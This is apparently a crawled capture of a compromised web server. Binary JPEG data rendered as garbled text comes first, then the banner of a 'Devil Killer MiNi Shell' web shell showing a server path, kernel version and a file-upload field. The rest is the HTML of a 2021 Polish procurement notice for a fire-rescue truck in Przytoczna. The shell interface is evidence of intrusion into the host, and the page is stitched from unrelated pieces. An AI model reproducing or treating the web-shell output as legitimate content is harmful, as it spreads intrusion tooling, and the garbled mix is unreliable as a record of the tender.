JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210706/0010541301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00105413 z dnia 2021-07-06</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa średniego samochodu ratowniczo – gaśniczego z napędem 4x4 dla OSP Rokitno” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Przytoczna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 21096682300000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rokitniańska 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przytoczna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-340</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">95 749 43 10</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">95 748 91 13</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@przytoczna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.przytoczna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Ochotnicza Straż Pożarna w Rokitnie </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Gmina Przytoczna</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">595-00-07-539</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Rokitniańska 4</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Przytoczna</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">66-340</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">95 749 43 10</span></h3> <h3 class="mb-0">1.11.10.) Numer faksu: <span class="normal">95 748 91 13</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">ug@przytoczna.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.przytoczna.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa średniego samochodu ratowniczo – gaśniczego z napędem 4x4 dla OSP Rokitno” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6e29119d-de2a-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00105413</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003403/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 „Dostawa średniego samochodu ratowniczo – gaśniczego z napędem 4x4 dla OSP Rokitno”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Pełnomocnikiem Zamawiającego a Wykonawcami odbywa się przy<br/>użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu<br/>usług drogą elektroniczną (Dz.U. z 2020 r. poz. 344), a mianowicie:<br/>1) miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/,<br/>2) ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal<br/>3) poczty elektronicznej pod adresem e-mail: ug@przytoczna.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć udział w postęp.o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: złożenia, zmiany, wycofania oferty oraz do formularza komunikacji.<br/>2.Maksymalny rozmiar plików przesyłanych za pośrednictwem dedyk. form.: „Formularz złożenia,<br/>zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>3.Wymag.techn.i organizacyjne wysyłania i odbierania dok.elektronicznych, elektron. kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Reg.<br/>korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług<br/>administracji publicznej (ePUAP).<br/>4.Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki<br/>korzystania z miniPortalu, określone w Regulaminie korzystania z miniPortalu oraz zobowiązuje się<br/>korzystając z miniPortalu przestrzegać postanowień tego Regulaminu.<br/>5.Za datę przekazania oferty, wniosków, zawiadomień, dok. elektron., oświadczeń lub elektron. kopii<br/>dok. lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP lub datę<br/>wpływu na adres poczty elektron. Pełnomocnika Zamawiającego (decydujące znaczenie będzie miała<br/>data otrzymania wiadomości przez system pocztowy Pełnomocnika Zamawiającego).<br/>6.Dane postępowanie można wyszukać na „Liście wszystkich postępowań” w miniPortalu klikając<br/>wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania”.<br/>7.W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Pełnom. Zam.a Wykonawcami w<br/>szczególności składanie oświadczeń (nie dotyczy składania ofert), wniosków, zawiadomień oraz<br/>przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego form.<br/>„Formularz do komunikacji” dostępnego na ePUAP oraz udostęp.przez miniPortal. We wszelkiej<br/>korespondencji związanej z niniejszym postępowaniem Pełnom. Zam. i Wyk. posługują się numerem<br/>ogłoszenia lub postęp. Pełnom. Zam. może również komunikować się z Wykon. za pomocą poczty<br/>elektron. (nie dotyczy składania ofert) na adres poczty elektron.: ug@przytoczna.pl.<br/>8.Dokumenty elektron., oświadczenia lub elektroniczne kopie dok. lub oświadczeń składane są przez<br/>Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Pełnomocnik<br/>Zamawiającego dopuszcza również możliwość składania dok.elektron., oświadczeń lub elektron. kopii<br/>dok. lub oświadczeń za pomocą poczty elektronicznej, na wskazany w pkt.8 powyżej adres email (nie<br/>dotyczy składania oferty).<br/>9.Sposób sporządzenia dok.elektr., oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń<br/>musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020r w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dok.elektron.oraz środków komunikacji elektron. w postepowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz rozp.Ministra Rozwoju, Pracy i Technologii z dnia 23<br/>grudnia 2020r w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy. (Dz.U.2020 poz.2415).<br/>10.Do porozumiewania się z Wykonawcami w sprawach związanych z postęp. upr. są następujące<br/>osoby: a.Monika Piechowiak – opis przedmiotu zamówienia – tel. 95 74 89 107;<br/>b.Joanna Czubkowska – w pozostałych sprawach – tel. 881-935-499.<br/>11.Wyżej wymienione osoby nie będą udzielać Wykonawcom wyjaśnień treści SWZ. Wszelkie pytania i<br/>wątpliwości w tej sprawie należy zgłaszać do Pełnomocnika Zamawiającego jako wnioski, o których<br/>mowa w art. 284 ust.1 ustawy Pzp, za pośrednictwem środków komunikacji elektronicznej.<br/>Pełnomocnik Zamawiającego udzieli wyjaśnień zgodnie z zasadami wskazanymi w art. 284 ustawy<br/>Pzp.<br/>12.W uzasadnionych przypadkach zamawiający może przed upływem terminu składania ofert zmienić<br/>SWZ. W takim przypadku stosuje się odpowiednio zapisy art.286 i 287 ustawy Pzp.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1. administratorem Pani/Pana danych osobowych jest Wójt Gminy Przytoczna z siedzibą ul.<br/>Rokitniańska 4, 66-340 Przytoczna.;<br/>1) Administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować we<br/>wszystkich sprawach dotyczących przetwarzania danych osobowych za pośrednictwem adresu email:<br/>inspektor@cbi24.pl lub pisemnie na adres Administratora<br/>2) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie podstawowym bez negocjacji;<br/>3) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy Pzp;<br/>4) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego;<br/>6) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>7) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>9) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IR.271.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa i przeniesienie własności na Zamawiającego<br/>fabrycznie nowego średniego samochodu ratowniczo – gaśniczego z napędem 4x4 dla<br/>Ochotniczej Straż Pożarnej w Rokitnie o parametrach i wyposażeniu zgodnym z treścią<br/>specyfikacji. Zamówienie finansowane jest ze środków Narodowego Funduszu Ochrony<br/>Środowiska i Gospodarki Wodnej, Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki<br/>Wodnej w Zielnej Górze, Krajowego Systemu Ratowniczo – Gaśniczego, Gminy Przytoczna.<br/>2. Pojazd powinien być wyposażony w urządzenie sygnalizacyjno - ostrzegawcze (akustyczne i<br/>świetlne) dla pojazdu uprzywilejowanego. Urządzenie akustyczne powinno umożliwiać<br/>podawanie komunikatów słownych. Głośnik lub głośniki o mocy min. 100 W. Belka<br/>sygnalizacyjna typu LED zamontowana na dachu samochodu.<br/>3. Podwozie pojazdu winno być wyprodukowane w 2021 r. spełniające następujące warunki:<br/>a. silnik o zapłonie samoczynnym o mocy minimum 320 KM, spełniający wymogi odnośnie<br/>czystości spalin zgodnie z obowiązującymi w tym zakresie przepisami min. EURO 6,<br/>b. skrzynia biegów - manualna o maksymalnym przełożeniu - 6 biegów do przodu +plus<br/>wsteczny,<br/>4. Napęd stały 4x4, skrzynia redukcyjna do jazdy w terenie.<br/>5. Zabudowa pożarnicza metalowo-kompozytowa. Zabudowa wykonana z materiałów odpornych<br/>na korozję.<br/>6. Zbiornik wody o pojemności min. 3000 litrów (± 2%)- wykonany z kompozytu.<br/>7. Zbiornik środka pianotwórczego o pojemności min. 10% pojemności zbiornika wody,<br/>wykonany z materiału odpornego na działanie dopuszczonych do stosowania środków<br/>pianotwórczych i modyfikatorów.<br/>8. Autopompa dwuzakresowa o wydajności min. 2800l/min. przy ciśnieniu 0,8 MPa dla<br/>głębokości ssania 1,5 m. Wydajność stopnia wysokiego ciśnienia min. 400 l/min. przy ciśnieniu<br/>4 MPa.<br/>9. Samochód wyposażony w co najmniej jedną wysokociśnieniową linię szybkiego natarcia o<br/>długości węża 60 m na zwijadle.<br/>10. Kabina czterodrzwiowa, jednomodułowa.<br/>11. Wykonawca zobowiązany jest do przekazania Zamawiającemu wraz z dostawą<br/>dokumentację pojazdu, w tym m.in. świadectwa dopuszczenia lub inne dokumenty<br/>potwierdzające dopuszczenie przedmiotu umowy do stosowania w ochronie przeciwpożarowej,<br/>obowiązujące na dzień odbioru oraz instrukcję obsługi, Książkę serwisową i gwarancyjną w<br/>języku polskim. Pojazd będzie spełniał wymagania określone w Ustawie z dnia 20 czerwca 1997<br/>r. Prawo o ruchu drogowym (t.j. Dz. U. z 2021 poz. 450 ze zm.) oraz w Rozporządzeniu Ministra<br/>Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz<br/>zakresu ich niezbędnego wyposażenia (Dz. U. z 2016 poz. 2022 ze zm).<br/>12. Po odbiorze pojazdu wraz z wyposażeniem oraz wszelkimi wymaganymi dokumentami<br/>Wykonawca zobowiązany jest do współpracy z Zamawiającym w trakcie procesu rejestracji. W<br/>szczególności zobowiązany jest do uzupełnienia wszelkich dokumentów wymaganych przez<br/>instytucje państwowe.<br/>13. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 8 – „Wymagania techniczne<br/>dla średniego samochodu ratowniczo-gaśniczego z napędem 4x4.”<br/>14. Jeżeli w SWZ oraz jej załącznikach podana jest nazwa własna, to oznacza, że została użyta/podana przykładowo. Wykonawca może zastosować materiały lub urządzenia<br/>równoważne, lecz o parametrach technicznych i jakościowych takich samych lub lepszych,<br/>których zastosowanie w żaden sposób nie wpłynie negatywnie na prawidłowe funkcjonowanie<br/>rozwiązań przyjętych w SWZ oraz załącznikach. Oznacza to, że Pełnomocnik Zamawiającego<br/>dopuszcza zastosowanie materiałów równoważnych dla nazwanych materiałów i urządzeń,<br/>wymienionych w SWZ i załącznikach z zachowaniem ich wymogów w zakresie jakości.<br/>Przedstawione parametry przedmiotu zamówienia stanowią minimum techniczne i jakościowe<br/>oczekiwane przez Pełnomocnika Zamawiającego i będą stanowiły podstawę oceny<br/>ewentualnych materiałów równoważnych. W przypadku przywołania w opisie przedmiotu<br/>zamówienia norm, ocen technicznych, specyfikacji technicznych i systemów referencji<br/>technicznych, o których mowa w art. 101 Pzp, Pełnomocnik Zamawiającego dopuszcza<br/>rozwiązania równoważne z opisywanym. W przypadku zaoferowania produktów równoważnych<br/>wykonawca jest zobowiązany wraz z ofertą złożyć oświadczenie oraz dokumenty na<br/>potwierdzenie równoważności zastosowanych materiałów, produktów i rozwiązań. Ciężar<br/>udowodnienia równoważności zaoferowanego przedmiotu spoczywa na wykonawcy.<br/>15. Wykonawca zobowiązany jest do udzielenia zamawiającemu gwarancji jakości na pojazd,<br/>zabudowę wraz z wyposażeniem, bez ograniczenia przebiegu, na okres minimum 24 miesięcy.<br/>Uwaga: Wydłużony okres gwarancji stanowi jedno z kryteriów oceny ofert określonych w<br/>rozdziale XVIII ust. 4 pkt 2) SWZ.<br/>16. Ustala się okres rękojmi równy okresowi gwarancji udzielonej na przedmiot zamówienia.<br/>Udzielona gwarancja nie ma wpływu na roszczenia w ramach obligatoryjnego systemu rękojmi.<br/>Bieg gwarancji i rękojmi rozpoczyna się następnego dnia licząc od daty odbioru przedmiotu<br/>umowy lub od daty potwierdzenia usunięcia wad w razie ich stwierdzenia przy odbiorze.<br/>Zamawiający może dochodzić roszczeń z tytułu gwarancji i rękojmi także po upływie wyżej<br/>określonych terminów, jeżeli reklamował wadę przed upływem tego terminu.<br/>17. Przedmiot zamówienia należy dostarczyć zgodnie z obowiązującymi przepisami prawa oraz<br/>zawartą z zamawiającym umową.<br/>18. Zamawiający wymaga, aby osoby wskazane przez wykonawcę, które będą uczestniczyć<br/>w wykonywaniu zamówienia posiadały biegłą znajomość języka polskiego. W przypadku gdy<br/>ww. osoby nie będą posiadały biegłej znajomości języka polskiego na okres i dla potrzeb<br/>realizacji przedmiotu zamówienia wykonawca zobowiązany jest zapewnić tłumacza na własny<br/>koszt i własnym staraniem.<br/>19. Wspólny Słownik Zamówień CPV:<br/>– 34144210-3 Wozy strażackie<br/>20. Pełnomocnik Zamawiającego nie przewiduje udzielania zamówień, o których mowa w art.<br/>214 ust. 1 pkt 7 i 8 Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144210-3 - Wozy strażackie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która 